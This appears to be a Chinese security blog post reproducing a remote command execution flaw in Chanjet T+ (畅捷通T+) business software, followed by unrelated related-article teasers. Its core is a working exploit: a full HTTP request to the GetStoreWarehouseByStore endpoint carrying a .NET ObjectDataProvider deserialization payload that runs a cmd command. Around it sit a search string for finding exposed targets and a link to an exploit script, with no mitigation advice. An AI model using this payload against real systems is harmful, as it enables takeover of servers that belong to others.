畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

news/2024/7/24 12:55:22 标签: 安全, 渗透测试, web安全, 漏洞复现

一、漏洞信息

漏洞名称:畅捷通T+ Ufida.T.DI.UIP.RRA.RRATableController 远程命令执行漏洞

漏洞类别:远程命令执行漏洞

风险等级:高危

二、漏洞描述

畅捷通TPlus适用于异地多组织、多机构对企业财务汇总的管理需求;全面支持企业对远程仓库、异地办事处的管理需求;全面满足企业财务业务一体化管理需求。其Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore接口存在反序列化漏洞,可导致命令执行。被攻击者利用此漏洞可直接接管服务器。 


三、影响范围

app="畅捷通-TPlus"


四、漏洞复现

POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 589

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName":"cmd", "Arguments":"/c whoami > tt.txt"
       }
    }
  }
}


五、脚本

https://github.com/ATonysan/poc-exp/blob/main/ChangJieTongT%2B_GetStoreWarehouseByStore_RCE.py


http://www.niftyadmin.cn/n/5453369.html

相关文章

android 13长按power键没有关机菜单

android 13集成GMS全家桶后长按power按键没有关机菜单出来。查看源码 frameworks/base/services/core/java/com/android/server/policy/PhoneWindowManager private void powerLongPress(long eventTime) {final int behavior getResolvedLongPressOnPowerBehavior();Slog.d…

开关电源为什么要接假负载?答案就在这

在电子设备的设计和调试过程中,很多电子工程师会遇见这样的情形:开关电源接假负载,虽然这样做的好处是可以保护电源本身,能提高电路的稳定性和可靠性,但细究原因很少人知道,所以下面将详细探讨这个问题。 1…

武汉星起航:亚马逊卖家运营新指南,爆款品类揭秘

随着全球电商市场的蓬勃发展,亚马逊作为领先的在线零售平台,为卖家提供了无限的商机。然而,在浩如烟海的商品中,如何选择低风险、高回报的产品,成为每个亚马逊卖家关注的焦点。近日,武汉星起航凭借其深厚的…

Postwoman 安装

Postwoman作为Postman的女朋友,具有免费开源、轻量级、快速且美观等特性,是一款非常好用的API调试工具。能帮助程序员节省时间,提升工作效率。 Github地址:GitHub - hoppscotch/hoppscotch: 👽 Open source API devel…

如何从外网访问内网服务器?

在网络通信中,内网服务器指的是位于私有网络内部的服务器,它们可以提供各种服务,如网站、应用程序等。由于安全性的考虑,内网服务器通常无法直接从外部网络访问。本文将介绍如何通过使用【天联】组网来实现从外网访问内网服务器的…

第十一届蓝桥杯大赛第二场省赛试题 CC++ 研究生组-寻找2020

数据很恶心&#xff0c;但是考点挺友好~ 把测试数据黏贴到记事本中&#xff0c;知测试数据的行列数 然后根据规则判断2020是否出现&#xff0c;并累计其次数即可。 判断可能需要注意超出下标&#xff0c;可以索性把数组定大些。 #include<stdio.h> const int N 310; ch…

论文解读 DIN: Deep Interest Network for Click-Through Rate Prediction

摘要 论文地址&#xff1a;https://arxiv.org/abs/1706.06978 DIN是阿里发表在 KDD2018 上的一篇关于对用户行为序列建模的一篇论文。论文出了一种新型模型&#xff1a; 深度兴趣网络&#xff08;DIN&#xff09;。通过设计一个局部激活单元来自适应地学习用户对某一广告历史…

华为云服务器租用价格_云服务器优惠活动_2024年新版报价

2024年华为云服务器租用价格表&#xff0c;云服务器优惠价格35元一年&#xff0c;配置为1核2G1M带宽HECS云服务器、L实例-2核2G3M配置46元1年、4核16G10M华为云服务器24元一个月、2核4G5M服务器158元一年&#xff0c;3年1010元、华为云香港服务器99元一年、增强型C7云服务器4核…